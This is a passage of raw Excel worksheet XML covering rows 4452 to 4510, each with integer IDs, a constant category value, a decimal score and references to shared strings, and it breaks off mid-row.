      <c r="A4452" s="1">
        <v>4450</v>
      </c>
      <c r="B4452">
        <v>776</v>
      </c>
      <c r="C4452">
        <v>776</v>
      </c>
      <c r="D4452">
        <v>2</v>
      </c>
      <c r="E4452">
        <v>0.71280002593994141</v>
      </c>
      <c r="F4452" t="s">
        <v>5592</v>
      </c>
      <c r="G4452" t="s">
        <v>8798</v>
      </c>
      <c r="H4452" t="s">
        <v>8799</v>
      </c>
    </row>
    <row r="4453" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4453" s="1">
        <v>4451</v>
      </c>
      <c r="B4453">
        <v>7559</v>
      </c>
      <c r="C4453">
        <v>7559</v>
      </c>
      <c r="D4453">
        <v>2</v>
      </c>
      <c r="E4453">
        <v>0.86779999732971191</v>
      </c>
      <c r="F4453" t="s">
        <v>5592</v>
      </c>
      <c r="G4453" t="s">
        <v>8800</v>
      </c>
      <c r="H4453" t="s">
        <v>8801</v>
      </c>
    </row>
    <row r="4454" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4454" s="1">
        <v>4452</v>
      </c>
      <c r="B4454">
        <v>779</v>
      </c>
      <c r="C4454">
        <v>779</v>
      </c>
      <c r="D4454">
        <v>2</v>
      </c>
      <c r="E4454">
        <v>0.86640000343322754</v>
      </c>
      <c r="F4454" t="s">
        <v>5592</v>
      </c>
      <c r="G4454" t="s">
        <v>8802</v>
      </c>
      <c r="H4454" t="s">
        <v>8803</v>
      </c>
    </row>
    <row r="4455" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4455" s="1">
        <v>4453</v>
      </c>
      <c r="B4455">
        <v>7558</v>
      </c>
      <c r="C4455">
        <v>7558</v>
      </c>
      <c r="D4455">
        <v>2</v>
      </c>
      <c r="E4455">
        <v>0.99980002641677856</v>
      </c>
      <c r="F4455" t="s">
        <v>5592</v>
      </c>
      <c r="G4455" t="s">
        <v>8804</v>
      </c>
      <c r="H4455" t="s">
        <v>8805</v>
      </c>
    </row>
    <row r="4456" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4456" s="1">
        <v>4454</v>
      </c>
      <c r="B4456">
        <v>783</v>
      </c>
      <c r="C4456">
        <v>783</v>
      </c>
      <c r="D4456">
        <v>2</v>
      </c>
      <c r="E4456">
        <v>0.5023999810218811</v>
      </c>
      <c r="F4456" t="s">
        <v>5592</v>
      </c>
      <c r="G4456" t="s">
        <v>8806</v>
      </c>
      <c r="H4456" t="s">
        <v>8807</v>
      </c>
    </row>
    <row r="4457" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4457" s="1">
        <v>4455</v>
      </c>
      <c r="B4457">
        <v>761</v>
      </c>
      <c r="C4457">
        <v>761</v>
      </c>
      <c r="D4457">
        <v>2</v>
      </c>
      <c r="E4457">
        <v>0.93889999389648438</v>
      </c>
      <c r="F4457" t="s">
        <v>5592</v>
      </c>
      <c r="G4457" t="s">
        <v>8808</v>
      </c>
      <c r="H4457" t="s">
        <v>8809</v>
      </c>
    </row>
    <row r="4458" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4458" s="1">
        <v>4456</v>
      </c>
      <c r="B4458">
        <v>785</v>
      </c>
      <c r="C4458">
        <v>785</v>
      </c>
      <c r="D4458">
        <v>2</v>
      </c>
      <c r="E4458">
        <v>0.89579999446868896</v>
      </c>
      <c r="F4458" t="s">
        <v>5592</v>
      </c>
      <c r="G4458" t="s">
        <v>8810</v>
      </c>
      <c r="H4458" t="s">
        <v>8811</v>
      </c>
    </row>
    <row r="4459" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4459" s="1">
        <v>4457</v>
      </c>
      <c r="B4459">
        <v>726</v>
      </c>
      <c r="C4459">
        <v>726</v>
      </c>
      <c r="D4459">
        <v>2</v>
      </c>
      <c r="E4459">
        <v>0.95999997854232788</v>
      </c>
      <c r="F4459" t="s">
        <v>5592</v>
      </c>
      <c r="G4459" t="s">
        <v>8812</v>
      </c>
      <c r="H4459" t="s">
        <v>8813</v>
      </c>
    </row>
    <row r="4460" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4460" s="1">
        <v>4458</v>
      </c>
      <c r="B4460">
        <v>724</v>
      </c>
      <c r="C4460">
        <v>724</v>
      </c>
      <c r="D4460">
        <v>2</v>
      </c>
      <c r="E4460">
        <v>0.54699999094009399</v>
      </c>
      <c r="F4460" t="s">
        <v>5592</v>
      </c>
      <c r="G4460" t="s">
        <v>8814</v>
      </c>
      <c r="H4460" t="s">
        <v>8815</v>
      </c>
    </row>
    <row r="4461" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4461" s="1">
        <v>4459</v>
      </c>
      <c r="B4461">
        <v>649</v>
      </c>
      <c r="C4461">
        <v>649</v>
      </c>
      <c r="D4461">
        <v>2</v>
      </c>
      <c r="E4461">
        <v>0.83079999685287476</v>
      </c>
      <c r="F4461" t="s">
        <v>5592</v>
      </c>
      <c r="G4461" t="s">
        <v>8816</v>
      </c>
      <c r="H4461" t="s">
        <v>8817</v>
      </c>
    </row>
    <row r="4462" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4462" s="1">
        <v>4460</v>
      </c>
      <c r="B4462">
        <v>659</v>
      </c>
      <c r="C4462">
        <v>659</v>
      </c>
      <c r="D4462">
        <v>2</v>
      </c>
      <c r="E4462">
        <v>0.99910002946853638</v>
      </c>
      <c r="F4462" t="s">
        <v>5592</v>
      </c>
      <c r="G4462" t="s">
        <v>8818</v>
      </c>
      <c r="H4462" t="s">
        <v>8819</v>
      </c>
    </row>
    <row r="4463" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4463" s="1">
        <v>4461</v>
      </c>
      <c r="B4463">
        <v>661</v>
      </c>
      <c r="C4463">
        <v>661</v>
      </c>
      <c r="D4463">
        <v>2</v>
      </c>
      <c r="E4463">
        <v>0.99889999628067017</v>
      </c>
      <c r="F4463" t="s">
        <v>5592</v>
      </c>
      <c r="G4463" t="s">
        <v>8820</v>
      </c>
      <c r="H4463" t="s">
        <v>8821</v>
      </c>
    </row>
    <row r="4464" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4464" s="1">
        <v>4462</v>
      </c>
      <c r="B4464">
        <v>664</v>
      </c>
      <c r="C4464">
        <v>664</v>
      </c>
      <c r="D4464">
        <v>2</v>
      </c>
      <c r="E4464">
        <v>0.99800002574920654</v>
      </c>
      <c r="F4464" t="s">
        <v>5592</v>
      </c>
      <c r="G4464" t="s">
        <v>8822</v>
      </c>
      <c r="H4464" t="s">
        <v>8823</v>
      </c>
    </row>
    <row r="4465" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4465" s="1">
        <v>4463</v>
      </c>
      <c r="B4465">
        <v>7637</v>
      </c>
      <c r="C4465">
        <v>7637</v>
      </c>
      <c r="D4465">
        <v>2</v>
      </c>
      <c r="E4465">
        <v>0.50470000505447388</v>
      </c>
      <c r="F4465" t="s">
        <v>5592</v>
      </c>
      <c r="G4465" t="s">
        <v>8824</v>
      </c>
      <c r="H4465" t="s">
        <v>8825</v>
      </c>
    </row>
    <row r="4466" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4466" s="1">
        <v>4464</v>
      </c>
      <c r="B4466">
        <v>7634</v>
      </c>
      <c r="C4466">
        <v>7634</v>
      </c>
      <c r="D4466">
        <v>2</v>
      </c>
      <c r="E4466">
        <v>0.76039999723434448</v>
      </c>
      <c r="F4466" t="s">
        <v>5592</v>
      </c>
      <c r="G4466" t="s">
        <v>8826</v>
      </c>
      <c r="H4466" t="s">
        <v>8827</v>
      </c>
    </row>
    <row r="4467" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4467" s="1">
        <v>4465</v>
      </c>
      <c r="B4467">
        <v>671</v>
      </c>
      <c r="C4467">
        <v>671</v>
      </c>
      <c r="D4467">
        <v>2</v>
      </c>
      <c r="E4467">
        <v>0.92799997329711914</v>
      </c>
      <c r="F4467" t="s">
        <v>5592</v>
      </c>
      <c r="G4467" t="s">
        <v>8828</v>
      </c>
      <c r="H4467" t="s">
        <v>8829</v>
      </c>
    </row>
    <row r="4468" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4468" s="1">
        <v>4466</v>
      </c>
      <c r="B4468">
        <v>672</v>
      </c>
      <c r="C4468">
        <v>672</v>
      </c>
      <c r="D4468">
        <v>2</v>
      </c>
      <c r="E4468">
        <v>0.84829998016357422</v>
      </c>
      <c r="F4468" t="s">
        <v>5592</v>
      </c>
      <c r="G4468" t="s">
        <v>8830</v>
      </c>
      <c r="H4468" t="s">
        <v>8831</v>
      </c>
    </row>
    <row r="4469" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4469" s="1">
        <v>4467</v>
      </c>
      <c r="B4469">
        <v>7632</v>
      </c>
      <c r="C4469">
        <v>7632</v>
      </c>
      <c r="D4469">
        <v>2</v>
      </c>
      <c r="E4469">
        <v>0.78939998149871826</v>
      </c>
      <c r="F4469" t="s">
        <v>5592</v>
      </c>
      <c r="G4469" t="s">
        <v>8832</v>
      </c>
      <c r="H4469" t="s">
        <v>8833</v>
      </c>
    </row>
    <row r="4470" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4470" s="1">
        <v>4468</v>
      </c>
      <c r="B4470">
        <v>676</v>
      </c>
      <c r="C4470">
        <v>676</v>
      </c>
      <c r="D4470">
        <v>2</v>
      </c>
      <c r="E4470">
        <v>0.99930000305175781</v>
      </c>
      <c r="F4470" t="s">
        <v>5592</v>
      </c>
      <c r="G4470" t="s">
        <v>8834</v>
      </c>
      <c r="H4470" t="s">
        <v>8835</v>
      </c>
    </row>
    <row r="4471" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4471" s="1">
        <v>4469</v>
      </c>
      <c r="B4471">
        <v>725</v>
      </c>
      <c r="C4471">
        <v>725</v>
      </c>
      <c r="D4471">
        <v>2</v>
      </c>
      <c r="E4471">
        <v>0.57169997692108154</v>
      </c>
      <c r="F4471" t="s">
        <v>5592</v>
      </c>
      <c r="G4471" t="s">
        <v>8836</v>
      </c>
      <c r="H4471" t="s">
        <v>8837</v>
      </c>
    </row>
    <row r="4472" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4472" s="1">
        <v>4470</v>
      </c>
      <c r="B4472">
        <v>7628</v>
      </c>
      <c r="C4472">
        <v>7628</v>
      </c>
      <c r="D4472">
        <v>2</v>
      </c>
      <c r="E4472">
        <v>0.71549999713897705</v>
      </c>
      <c r="F4472" t="s">
        <v>5592</v>
      </c>
      <c r="G4472" t="s">
        <v>8838</v>
      </c>
      <c r="H4472" t="s">
        <v>8839</v>
      </c>
    </row>
    <row r="4473" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4473" s="1">
        <v>4471</v>
      </c>
      <c r="B4473">
        <v>7624</v>
      </c>
      <c r="C4473">
        <v>7624</v>
      </c>
      <c r="D4473">
        <v>2</v>
      </c>
      <c r="E4473">
        <v>0.99379998445510864</v>
      </c>
      <c r="F4473" t="s">
        <v>5592</v>
      </c>
      <c r="G4473" t="s">
        <v>8840</v>
      </c>
      <c r="H4473" t="s">
        <v>8841</v>
      </c>
    </row>
    <row r="4474" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4474" s="1">
        <v>4472</v>
      </c>
      <c r="B4474">
        <v>7622</v>
      </c>
      <c r="C4474">
        <v>7622</v>
      </c>
      <c r="D4474">
        <v>2</v>
      </c>
      <c r="E4474">
        <v>0.87230002880096436</v>
      </c>
      <c r="F4474" t="s">
        <v>5592</v>
      </c>
      <c r="G4474" t="s">
        <v>8842</v>
      </c>
      <c r="H4474" t="s">
        <v>8843</v>
      </c>
    </row>
    <row r="4475" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4475" s="1">
        <v>4473</v>
      </c>
      <c r="B4475">
        <v>7613</v>
      </c>
      <c r="C4475">
        <v>7613</v>
      </c>
      <c r="D4475">
        <v>2</v>
      </c>
      <c r="E4475">
        <v>0.98710000514984131</v>
      </c>
      <c r="F4475" t="s">
        <v>5592</v>
      </c>
      <c r="G4475" t="s">
        <v>8844</v>
      </c>
      <c r="H4475" t="s">
        <v>8845</v>
      </c>
    </row>
    <row r="4476" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4476" s="1">
        <v>4474</v>
      </c>
      <c r="B4476">
        <v>7605</v>
      </c>
      <c r="C4476">
        <v>7605</v>
      </c>
      <c r="D4476">
        <v>2</v>
      </c>
      <c r="E4476">
        <v>0.9976000189781189</v>
      </c>
      <c r="F4476" t="s">
        <v>5592</v>
      </c>
      <c r="G4476" t="s">
        <v>8846</v>
      </c>
      <c r="H4476" t="s">
        <v>8847</v>
      </c>
    </row>
    <row r="4477" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4477" s="1">
        <v>4475</v>
      </c>
      <c r="B4477">
        <v>711</v>
      </c>
      <c r="C4477">
        <v>711</v>
      </c>
      <c r="D4477">
        <v>2</v>
      </c>
      <c r="E4477">
        <v>0.79750001430511475</v>
      </c>
      <c r="F4477" t="s">
        <v>5592</v>
      </c>
      <c r="G4477" t="s">
        <v>8848</v>
      </c>
      <c r="H4477" t="s">
        <v>8849</v>
      </c>
    </row>
    <row r="4478" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4478" s="1">
        <v>4476</v>
      </c>
      <c r="B4478">
        <v>7596</v>
      </c>
      <c r="C4478">
        <v>7596</v>
      </c>
      <c r="D4478">
        <v>2</v>
      </c>
      <c r="E4478">
        <v>0.99650001525878906</v>
      </c>
      <c r="F4478" t="s">
        <v>5592</v>
      </c>
      <c r="G4478" t="s">
        <v>8850</v>
      </c>
      <c r="H4478" t="s">
        <v>8851</v>
      </c>
    </row>
    <row r="4479" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4479" s="1">
        <v>4477</v>
      </c>
      <c r="B4479">
        <v>7594</v>
      </c>
      <c r="C4479">
        <v>7594</v>
      </c>
      <c r="D4479">
        <v>2</v>
      </c>
      <c r="E4479">
        <v>0.99720001220703125</v>
      </c>
      <c r="F4479" t="s">
        <v>5592</v>
      </c>
      <c r="G4479" t="s">
        <v>8852</v>
      </c>
      <c r="H4479" t="s">
        <v>8853</v>
      </c>
    </row>
    <row r="4480" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4480" s="1">
        <v>4478</v>
      </c>
      <c r="B4480">
        <v>7593</v>
      </c>
      <c r="C4480">
        <v>7593</v>
      </c>
      <c r="D4480">
        <v>2</v>
      </c>
      <c r="E4480">
        <v>0.44670000672340388</v>
      </c>
      <c r="F4480" t="s">
        <v>5592</v>
      </c>
      <c r="G4480" t="s">
        <v>8854</v>
      </c>
      <c r="H4480" t="s">
        <v>8855</v>
      </c>
    </row>
    <row r="4481" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4481" s="1">
        <v>4479</v>
      </c>
      <c r="B4481">
        <v>721</v>
      </c>
      <c r="C4481">
        <v>721</v>
      </c>
      <c r="D4481">
        <v>2</v>
      </c>
      <c r="E4481">
        <v>0.85729998350143433</v>
      </c>
      <c r="F4481" t="s">
        <v>5592</v>
      </c>
      <c r="G4481" t="s">
        <v>8856</v>
      </c>
      <c r="H4481" t="s">
        <v>8857</v>
      </c>
    </row>
    <row r="4482" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4482" s="1">
        <v>4480</v>
      </c>
      <c r="B4482">
        <v>722</v>
      </c>
      <c r="C4482">
        <v>722</v>
      </c>
      <c r="D4482">
        <v>2</v>
      </c>
      <c r="E4482">
        <v>0.47369998693466192</v>
      </c>
      <c r="F4482" t="s">
        <v>5592</v>
      </c>
      <c r="G4482" t="s">
        <v>8858</v>
      </c>
      <c r="H4482" t="s">
        <v>8859</v>
      </c>
    </row>
    <row r="4483" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4483" s="1">
        <v>4481</v>
      </c>
      <c r="B4483">
        <v>7625</v>
      </c>
      <c r="C4483">
        <v>7625</v>
      </c>
      <c r="D4483">
        <v>2</v>
      </c>
      <c r="E4483">
        <v>0.64399999380111694</v>
      </c>
      <c r="F4483" t="s">
        <v>5592</v>
      </c>
      <c r="G4483" t="s">
        <v>8860</v>
      </c>
      <c r="H4483" t="s">
        <v>8861</v>
      </c>
    </row>
    <row r="4484" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4484" s="1">
        <v>4482</v>
      </c>
      <c r="B4484">
        <v>2092</v>
      </c>
      <c r="C4484">
        <v>2092</v>
      </c>
      <c r="D4484">
        <v>2</v>
      </c>
      <c r="E4484">
        <v>0.74080002307891846</v>
      </c>
      <c r="F4484" t="s">
        <v>5592</v>
      </c>
      <c r="G4484" t="s">
        <v>8862</v>
      </c>
      <c r="H4484" t="s">
        <v>8863</v>
      </c>
    </row>
    <row r="4485" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4485" s="1">
        <v>4483</v>
      </c>
      <c r="B4485">
        <v>5575</v>
      </c>
      <c r="C4485">
        <v>5575</v>
      </c>
      <c r="D4485">
        <v>2</v>
      </c>
      <c r="E4485">
        <v>0.68980002403259277</v>
      </c>
      <c r="F4485" t="s">
        <v>5592</v>
      </c>
      <c r="G4485" t="s">
        <v>8864</v>
      </c>
      <c r="H4485" t="s">
        <v>8865</v>
      </c>
    </row>
    <row r="4486" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4486" s="1">
        <v>4484</v>
      </c>
      <c r="B4486">
        <v>2093</v>
      </c>
      <c r="C4486">
        <v>2093</v>
      </c>
      <c r="D4486">
        <v>2</v>
      </c>
      <c r="E4486">
        <v>0.99919998645782471</v>
      </c>
      <c r="F4486" t="s">
        <v>5592</v>
      </c>
      <c r="G4486" t="s">
        <v>8866</v>
      </c>
      <c r="H4486" t="s">
        <v>8867</v>
      </c>
    </row>
    <row r="4487" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4487" s="1">
        <v>4485</v>
      </c>
      <c r="B4487">
        <v>2920</v>
      </c>
      <c r="C4487">
        <v>2920</v>
      </c>
      <c r="D4487">
        <v>2</v>
      </c>
      <c r="E4487">
        <v>0.92430001497268677</v>
      </c>
      <c r="F4487" t="s">
        <v>5592</v>
      </c>
      <c r="G4487" t="s">
        <v>8868</v>
      </c>
      <c r="H4487" t="s">
        <v>8869</v>
      </c>
    </row>
    <row r="4488" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4488" s="1">
        <v>4486</v>
      </c>
      <c r="B4488">
        <v>2921</v>
      </c>
      <c r="C4488">
        <v>2921</v>
      </c>
      <c r="D4488">
        <v>2</v>
      </c>
      <c r="E4488">
        <v>0.72170001268386841</v>
      </c>
      <c r="F4488" t="s">
        <v>5592</v>
      </c>
      <c r="G4488" t="s">
        <v>8870</v>
      </c>
      <c r="H4488" t="s">
        <v>8871</v>
      </c>
    </row>
    <row r="4489" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4489" s="1">
        <v>4487</v>
      </c>
      <c r="B4489">
        <v>2922</v>
      </c>
      <c r="C4489">
        <v>2922</v>
      </c>
      <c r="D4489">
        <v>2</v>
      </c>
      <c r="E4489">
        <v>0.57029998302459717</v>
      </c>
      <c r="F4489" t="s">
        <v>5592</v>
      </c>
      <c r="G4489" t="s">
        <v>8872</v>
      </c>
      <c r="H4489" t="s">
        <v>8873</v>
      </c>
    </row>
    <row r="4490" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4490" s="1">
        <v>4488</v>
      </c>
      <c r="B4490">
        <v>2924</v>
      </c>
      <c r="C4490">
        <v>2924</v>
      </c>
      <c r="D4490">
        <v>2</v>
      </c>
      <c r="E4490">
        <v>0.89550000429153442</v>
      </c>
      <c r="F4490" t="s">
        <v>5592</v>
      </c>
      <c r="G4490" t="s">
        <v>8874</v>
      </c>
      <c r="H4490" t="s">
        <v>8875</v>
      </c>
    </row>
    <row r="4491" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4491" s="1">
        <v>4489</v>
      </c>
      <c r="B4491">
        <v>2925</v>
      </c>
      <c r="C4491">
        <v>2925</v>
      </c>
      <c r="D4491">
        <v>2</v>
      </c>
      <c r="E4491">
        <v>0.76579999923706055</v>
      </c>
      <c r="F4491" t="s">
        <v>5592</v>
      </c>
      <c r="G4491" t="s">
        <v>8876</v>
      </c>
      <c r="H4491" t="s">
        <v>8877</v>
      </c>
    </row>
    <row r="4492" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4492" s="1">
        <v>4490</v>
      </c>
      <c r="B4492">
        <v>6633</v>
      </c>
      <c r="C4492">
        <v>6633</v>
      </c>
      <c r="D4492">
        <v>2</v>
      </c>
      <c r="E4492">
        <v>0.78930002450942993</v>
      </c>
      <c r="F4492" t="s">
        <v>5592</v>
      </c>
      <c r="G4492" t="s">
        <v>8878</v>
      </c>
      <c r="H4492" t="s">
        <v>8879</v>
      </c>
    </row>
    <row r="4493" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4493" s="1">
        <v>4491</v>
      </c>
      <c r="B4493">
        <v>2929</v>
      </c>
      <c r="C4493">
        <v>2929</v>
      </c>
      <c r="D4493">
        <v>2</v>
      </c>
      <c r="E4493">
        <v>0.93279999494552612</v>
      </c>
      <c r="F4493" t="s">
        <v>5592</v>
      </c>
      <c r="G4493" t="s">
        <v>8880</v>
      </c>
      <c r="H4493" t="s">
        <v>8881</v>
      </c>
    </row>
    <row r="4494" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4494" s="1">
        <v>4492</v>
      </c>
      <c r="B4494">
        <v>2930</v>
      </c>
      <c r="C4494">
        <v>2930</v>
      </c>
      <c r="D4494">
        <v>2</v>
      </c>
      <c r="E4494">
        <v>0.56950002908706665</v>
      </c>
      <c r="F4494" t="s">
        <v>5592</v>
      </c>
      <c r="G4494" t="s">
        <v>8882</v>
      </c>
      <c r="H4494" t="s">
        <v>8883</v>
      </c>
    </row>
    <row r="4495" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4495" s="1">
        <v>4493</v>
      </c>
      <c r="B4495">
        <v>2932</v>
      </c>
      <c r="C4495">
        <v>2932</v>
      </c>
      <c r="D4495">
        <v>2</v>
      </c>
      <c r="E4495">
        <v>0.55980002880096436</v>
      </c>
      <c r="F4495" t="s">
        <v>5592</v>
      </c>
      <c r="G4495" t="s">
        <v>8884</v>
      </c>
      <c r="H4495" t="s">
        <v>8885</v>
      </c>
    </row>
    <row r="4496" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4496" s="1">
        <v>4494</v>
      </c>
      <c r="B4496">
        <v>6632</v>
      </c>
      <c r="C4496">
        <v>6632</v>
      </c>
      <c r="D4496">
        <v>2</v>
      </c>
      <c r="E4496">
        <v>0.98930001258850098</v>
      </c>
      <c r="F4496" t="s">
        <v>5592</v>
      </c>
      <c r="G4496" t="s">
        <v>8886</v>
      </c>
      <c r="H4496" t="s">
        <v>8887</v>
      </c>
    </row>
    <row r="4497" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4497" s="1">
        <v>4495</v>
      </c>
      <c r="B4497">
        <v>2934</v>
      </c>
      <c r="C4497">
        <v>2934</v>
      </c>
      <c r="D4497">
        <v>2</v>
      </c>
      <c r="E4497">
        <v>0.58380001783370972</v>
      </c>
      <c r="F4497" t="s">
        <v>5592</v>
      </c>
      <c r="G4497" t="s">
        <v>8888</v>
      </c>
      <c r="H4497" t="s">
        <v>8889</v>
      </c>
    </row>
    <row r="4498" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4498" s="1">
        <v>4496</v>
      </c>
      <c r="B4498">
        <v>6631</v>
      </c>
      <c r="C4498">
        <v>6631</v>
      </c>
      <c r="D4498">
        <v>2</v>
      </c>
      <c r="E4498">
        <v>0.99970000982284546</v>
      </c>
      <c r="F4498" t="s">
        <v>5592</v>
      </c>
      <c r="G4498" t="s">
        <v>8890</v>
      </c>
      <c r="H4498" t="s">
        <v>8891</v>
      </c>
    </row>
    <row r="4499" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4499" s="1">
        <v>4497</v>
      </c>
      <c r="B4499">
        <v>2942</v>
      </c>
      <c r="C4499">
        <v>2942</v>
      </c>
      <c r="D4499">
        <v>2</v>
      </c>
      <c r="E4499">
        <v>0.62629997730255127</v>
      </c>
      <c r="F4499" t="s">
        <v>5592</v>
      </c>
      <c r="G4499" t="s">
        <v>8892</v>
      </c>
      <c r="H4499" t="s">
        <v>8893</v>
      </c>
    </row>
    <row r="4500" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4500" s="1">
        <v>4498</v>
      </c>
      <c r="B4500">
        <v>2945</v>
      </c>
      <c r="C4500">
        <v>2945</v>
      </c>
      <c r="D4500">
        <v>2</v>
      </c>
      <c r="E4500">
        <v>0.7444000244140625</v>
      </c>
      <c r="F4500" t="s">
        <v>5592</v>
      </c>
      <c r="G4500" t="s">
        <v>8894</v>
      </c>
      <c r="H4500" t="s">
        <v>8895</v>
      </c>
    </row>
    <row r="4501" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4501" s="1">
        <v>4499</v>
      </c>
      <c r="B4501">
        <v>2952</v>
      </c>
      <c r="C4501">
        <v>2952</v>
      </c>
      <c r="D4501">
        <v>2</v>
      </c>
      <c r="E4501">
        <v>0.88919997215270996</v>
      </c>
      <c r="F4501" t="s">
        <v>5592</v>
      </c>
      <c r="G4501" t="s">
        <v>8896</v>
      </c>
      <c r="H4501" t="s">
        <v>8897</v>
      </c>
    </row>
    <row r="4502" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4502" s="1">
        <v>4500</v>
      </c>
      <c r="B4502">
        <v>6607</v>
      </c>
      <c r="C4502">
        <v>6607</v>
      </c>
      <c r="D4502">
        <v>2</v>
      </c>
      <c r="E4502">
        <v>0.90219998359680176</v>
      </c>
      <c r="F4502" t="s">
        <v>5592</v>
      </c>
      <c r="G4502" t="s">
        <v>8898</v>
      </c>
      <c r="H4502" t="s">
        <v>8899</v>
      </c>
    </row>
    <row r="4503" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4503" s="1">
        <v>4501</v>
      </c>
      <c r="B4503">
        <v>6602</v>
      </c>
      <c r="C4503">
        <v>6602</v>
      </c>
      <c r="D4503">
        <v>2</v>
      </c>
      <c r="E4503">
        <v>0.98589998483657837</v>
      </c>
      <c r="F4503" t="s">
        <v>5592</v>
      </c>
      <c r="G4503" t="s">
        <v>8900</v>
      </c>
      <c r="H4503" t="s">
        <v>8901</v>
      </c>
    </row>
    <row r="4504" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4504" s="1">
        <v>4502</v>
      </c>
      <c r="B4504">
        <v>2964</v>
      </c>
      <c r="C4504">
        <v>2964</v>
      </c>
      <c r="D4504">
        <v>2</v>
      </c>
      <c r="E4504">
        <v>0.99800002574920654</v>
      </c>
      <c r="F4504" t="s">
        <v>5592</v>
      </c>
      <c r="G4504" t="s">
        <v>8902</v>
      </c>
      <c r="H4504" t="s">
        <v>8903</v>
      </c>
    </row>
    <row r="4505" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4505" s="1">
        <v>4503</v>
      </c>
      <c r="B4505">
        <v>2968</v>
      </c>
      <c r="C4505">
        <v>2968</v>
      </c>
      <c r="D4505">
        <v>2</v>
      </c>
      <c r="E4505">
        <v>0.821399986743927</v>
      </c>
      <c r="F4505" t="s">
        <v>5592</v>
      </c>
      <c r="G4505" t="s">
        <v>8904</v>
      </c>
      <c r="H4505" t="s">
        <v>8905</v>
      </c>
    </row>
    <row r="4506" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4506" s="1">
        <v>4504</v>
      </c>
      <c r="B4506">
        <v>2973</v>
      </c>
      <c r="C4506">
        <v>2973</v>
      </c>
      <c r="D4506">
        <v>2</v>
      </c>
      <c r="E4506">
        <v>0.8848000168800354</v>
      </c>
      <c r="F4506" t="s">
        <v>5592</v>
      </c>
      <c r="G4506" t="s">
        <v>8906</v>
      </c>
      <c r="H4506" t="s">
        <v>8907</v>
      </c>
    </row>
    <row r="4507" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4507" s="1">
        <v>4505</v>
      </c>
      <c r="B4507">
        <v>2975</v>
      </c>
      <c r="C4507">
        <v>2975</v>
      </c>
      <c r="D4507">
        <v>2</v>
      </c>
      <c r="E4507">
        <v>0.93809998035430908</v>
      </c>
      <c r="F4507" t="s">
        <v>5592</v>
      </c>
      <c r="G4507" t="s">
        <v>8908</v>
      </c>
      <c r="H4507" t="s">
        <v>8909</v>
      </c>
    </row>
    <row r="4508" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4508" s="1">
        <v>4506</v>
      </c>
      <c r="B4508">
        <v>6637</v>
      </c>
      <c r="C4508">
        <v>6637</v>
      </c>
      <c r="D4508">
        <v>2</v>
      </c>
      <c r="E4508">
        <v>0.67830002307891846</v>
      </c>
      <c r="F4508" t="s">
        <v>5592</v>
      </c>
      <c r="G4508" t="s">
        <v>8910</v>
      </c>
      <c r="H4508" t="s">
        <v>8911</v>
      </c>
    </row>
    <row r="4509" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4509" s="1">
        <v>4507</v>
      </c>
      <c r="B4509">
        <v>6592</v>
      </c>
      <c r="C4509">
        <v>6592</v>
      </c>
      <c r="D4509">
        <v>2</v>
      </c>
      <c r="E4509">
        <v>0.62889999151229858</v>
      </c>
      <c r="F4509" t="s">
        <v>5592</v>
      </c>
      <c r="G4509" t="s">
        <v>8912</v>
      </c>
      <c r="H4509" t="s">
        <v>8913</v>
      </c>
    </row>
    <row r="4510" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4510" s="1">
        <v>4508</v>
      </c>
      <c r="B4510">
        <v>6642</v>
      </c>
      <c r="C4510">
        <v>6642</v>
      </c>
      <c r="D4510">
        <v>2</v>
      </c>
      <c r="E4510">
        <v>0.96520000696182251</v>
